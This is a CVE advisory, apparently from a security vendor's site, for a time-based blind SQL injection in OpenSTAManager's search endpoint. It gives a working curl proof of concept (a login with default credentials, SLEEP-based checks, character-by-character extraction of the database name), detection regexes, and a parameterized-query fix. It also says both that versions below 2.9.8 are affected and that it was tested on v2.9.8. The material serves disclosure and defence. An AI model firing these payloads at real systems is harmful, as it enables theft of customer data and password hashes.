CVE-2026-24417

CVE-2026-24417 is a high-severity SQL injection vulnerability in devcode-it/openstamanager (composer), affecting versions < 2.9.8. No fixed version is listed yet.

Summary

A critical time-based blind SQL injection vulnerability affecting multiple search modules in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents, including password hashes, customer data, and financial records, through time-based Boolean inference attacks, with amplified execution across 10+ modules.

Status: ✅ Confirmed and tested on live instance (v2.9.8)
Vulnerable Parameter: term (GET)
Affected Endpoint: /ajax_search.php
Affected Modules: Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi

Details

OpenSTAManager v2.9.8 contains a critical Time-Based Blind SQL Injection vulnerability in the global search functionality. The application fails to properly sanitize the term parameter before using it in SQL LIKE clauses across multiple module-specific search handlers, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.

Vulnerability Chain:

  1. Entry Point: /ajax_search.php (Lines 30-31)

    $term = get('term');
    $term = str_replace('/', '\\/', $term);

    The $term parameter undergoes minimal sanitization: only forward slashes are escaped, which does nothing to neutralize quotes or SQL keywords.

  2. Distribution: /src/AJAX.php::search() (Lines 159-161)

    $files = self::find('ajax/search.php');
    array_unshift($files, base_dir().'/ajax_search.php');
    foreach ($files as $file) {
        $module_results = self::getSearchResults($file, $term);

    The unsanitized $term is passed to all module-specific search handlers.

  3. Execution: /src/AJAX.php::getSearchResults() (Line 373)

    require $file;
    

    Each module's search.php file is included with the $term variable in scope, so the tainted value is available to every handler's query construction.

  4. Vulnerable SQL Queries: Multiple modules directly concatenate $term without prepare()

All Affected Files (10+ vulnerable instances):

  1. /modules/articoli/ajax/search.php - Line 51 (PRIMARY EXAMPLE)

    foreach ($fields as $name => $value) {
        $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    }
    $rs = $dbo->fetchArray($query);
    

    Impact: Direct concatenation without prepare() allows full SQL injection.

  2. /modules/ordini/ajax/search.php - Lines 43, 47

    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    $query .= '... WHERE `mg_articoli`.`codice` LIKE "%'.$term.'%" OR `mg_articoli_lang`.`title` LIKE "%'.$term.'%"';
    
  3. /modules/ddt/ajax/search.php - Lines 43, 47

    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  4. /modules/fatture/ajax/search.php - Lines 45, 49

    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  5. /modules/preventivi/ajax/search.php - Lines 45, 49

    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  6. /modules/anagrafiche/ajax/search.php - Lines 62, 107, 162

    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  7. /modules/impianti/ajax/search.php - Line 46

    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    

Properly Sanitized (NOT vulnerable):

  • /modules/contratti/ajax/search.php - Uses prepare() correctly
  • /modules/automezzi/ajax/search.php - Uses prepare() correctly

Note: The vulnerability has amplified execution - a single malicious request triggers SQL Injection across ALL vulnerable modules simultaneously, causing time-based attacks to execute 10+ times per request, multiplying the delay and leading to 504 Gateway Time-out errors as observed on the live demo instance.

PoC

Step 1: Login

curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Step 2: Verify Vulnerability (Time-Based SLEEP)

# Test with SLEEP(1) - should take ~85+ seconds due to amplified execution
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22'
# Result: real 72.29s

# Test with SLEEP(0) - should be fast
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(0)%20OR%20%22'
# Result: real 0.30s

Step 3: Data Extraction - Database Name

# Extract first character of database name (expected: 'o' from 'openstamanager')
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 170.32s

# Test with wrong character 'x' - should be fast
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 0m0.30s
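A defender-side counterpart to the probes above, as an added example that is not part of the advisory or of OpenSTAManager: a small PHP scanner that flags /ajax_search.php requests in web-server access logs whose decoded term carries a delay primitive or a quote followed by a boolean operator. The log lines are constructed, and extractSearchTerm, isSuspiciousTerm and scanAccessLog are hypothetical names.

```php
<?php
// Added example, not part of the advisory or OpenSTAManager: flags the probe
// shape used above in web-server access logs. A /ajax_search.php request whose
// decoded `term` carries a delay function, or a quote followed by AND/OR, is
// reported. Log lines are constructed; function names are hypothetical.

// Returns the url-decoded term of a /ajax_search.php request, else null.
function extractSearchTerm(string $requestTarget): ?string
{
    $parts = parse_url($requestTarget);
    if (($parts['path'] ?? '') !== '/ajax_search.php' || empty($parts['query'])) {
        return null;
    }
    parse_str($parts['query'], $params); // decodes %xx, splits on the first '='
    return isset($params['term']) ? (string) $params['term'] : null;
}
// Heuristics for the time-based probes shown in the PoC: a delay primitive,
// or a double quote that closes LIKE "%...%" followed by a boolean operator.
function isSuspiciousTerm(string $term): bool
{
    return (bool) preg_match('/\b(SLEEP|BENCHMARK)\s*\(/i', $term)
        || (bool) preg_match('/"\s*(AND|OR)\b/i', $term);
}
// Scans combined-format lines; returns client ip, status and term per hit.
function scanAccessLog(array $lines): array
{
    $re   = '/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP\/[\d.]+" (\d{3})/';
    $hits = [];
    foreach ($lines as $line) {
        if (!preg_match($re, $line, $m)) {
            continue;
        }
        $term = extractSearchTerm($m[2]);
        if ($term !== null && isSuspiciousTerm($term)) {
            $hits[] = ['ip' => $m[1], 'status' => (int) $m[3], 'term' => $term];
        }
    }
    return $hits;
}

// Constructed sample: a benign search, a SLEEP(1) probe, and a character test
// that ran into the 504 timeout the advisory mentions.
$log = [
    '10.0.0.5 - - [01/Mar/2026:10:00:01 +0000] "GET /ajax_search.php?term=vite HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Mar/2026:10:00:07 +0000] "GET /ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22 HTTP/1.1" 200 98',
    '10.0.0.9 - - [01/Mar/2026:10:01:30 +0000] "GET /ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221 HTTP/1.1" 504 0',
];
foreach (scanAccessLog($log) as $hit) {
    printf("%s status=%d term=%s\n", $hit['ip'], $hit['status'], $hit['term']);
}
```

The benign search is not reported; the two probe requests from the same client are, and a cluster of such hits ending in 504s matches the amplified-delay behaviour described above.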

Impact

Affected Users: All authenticated users with access to the global search functionality.

  • Complete database exfiltration including customer PII, financial records, business secrets
  • Extraction of password hashes for offline cracking
  • Amplified time-based attacks consume 85x server resources per request

Recommended Fix:

Replace all instances of direct $term concatenation with prepare():

BEFORE (Vulnerable):

$query .= ' OR '.$value.' LIKE "%'.$term.'%"';

AFTER (Fixed):

$query .= ' OR '.$value.' LIKE '.prepare('%'.$term.'%');

Apply this fix to ALL affected files:

  1. /modules/articoli/ajax/search.php - Line 51
  2. /modules/ordini/ajax/search.php - Lines 43, 47, 79
  3. /modules/ddt/ajax/search.php - Lines 43, 47, 83
  4. /modules/fatture/ajax/search.php - Lines 45, 49, 85
  5. /modules/preventivi/ajax/search.php - Lines 45, 49, 83
  6. /modules/anagrafiche/ajax/search.php - Lines 62, 107, 162
  7. /modules/impianti/ajax/search.php - Line 46
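The per-field LIKE clause from the vulnerability chain and the fix above, as an added example that is not OpenSTAManager's own code (the project uses its prepare() helper): the advisory's vulnerable construction beside a version that binds each value as a PDO parameter and escapes the term's own LIKE wildcards. buildVulnerableWhere and buildSafeWhere are hypothetical names, and $fields stands for the application's own allow-list of column names.

```php
<?php
// Added example, not OpenSTAManager code: the per-field LIKE clause from the
// advisory built the vulnerable way and then with PDO bound parameters.
// buildVulnerableWhere/buildSafeWhere are hypothetical names; $fields is the
// application's own allow-list of column names, never request input.
declare(strict_types=1);

// The pattern from modules/*/ajax/search.php: $term is spliced into the SQL.
function buildVulnerableWhere(array $fields, string $term): string
{
    $query = '1=0';
    foreach ($fields as $value) {
        $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    }
    return $query;
}

// Hardened: each LIKE value is a placeholder, so the term is data, and the
// term's own % and _ are escaped so they match literally (MySQL treats a
// backslash as the LIKE escape character unless ESCAPE says otherwise).
// Returns [sql fragment, bound parameters].
function buildSafeWhere(array $fields, string $term): array
{
    $escaped = str_replace(['\\', '%', '_'], ['\\\\', '\\%', '\\_'], $term);
    $clauses = [];
    $params  = [];
    foreach (array_values($fields) as $i => $value) {
        $clauses[]          = $value.' LIKE :term'.$i;
        $params[':term'.$i] = '%'.$escaped.'%';
    }
    return [$clauses ? implode(' OR ', $clauses) : '1=0', $params];
}

// Constructed input: the probe shape from the advisory's PoC.
$fields = ['`mg_articoli`.`codice`', '`mg_articoli_lang`.`title`'];
$term   = '" AND 0 OR SLEEP(1) OR "';

echo buildVulnerableWhere($fields, $term), PHP_EOL; // SLEEP(1) became SQL
[$sql, $params] = buildSafeWhere($fields, $term);
echo $sql, PHP_EOL;                                  // placeholders only
print_r($params);                                    // the payload is a value

// Execution with PDO keeps the values out of the SQL text entirely:
// $stmt = $pdo->prepare('SELECT ... FROM `mg_articoli` ... WHERE '.$sql);
// $stmt->execute($params);
```

Column names still come from the application's own list, since a bound parameter can only stand in for a value, never for an identifier.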

Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access. Typical impact: data disclosure or modification.

Affected versions

devcode-it/openstamanager (< 2.9.8)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

No fixed version is listed for CVE-2026-24417 yet.

In the interim: Use parameterized queries or prepared statements so user input is always treated as data, never as SQL syntax.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-24417? CVE-2026-24417 is a high-severity SQL injection vulnerability in devcode-it/openstamanager (composer), affecting versions < 2.9.8. No fixed version is listed yet. Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access.
  2. Which versions of devcode-it/openstamanager are affected by CVE-2026-24417? devcode-it/openstamanager (composer) versions < 2.9.8 are affected.
  3. Is there a fix for CVE-2026-24417? No fixed version is listed for CVE-2026-24417 yet. Monitor the advisory for updates and apply mitigations in the interim.
  4. Is CVE-2026-24417 exploitable, and should I be worried? Whether CVE-2026-24417 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  5. What actually determines whether CVE-2026-24417 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-24417? No fixed version is listed yet. In the interim: Use parameterized queries or prepared statements so user input is always treated as data, never as SQL syntax.
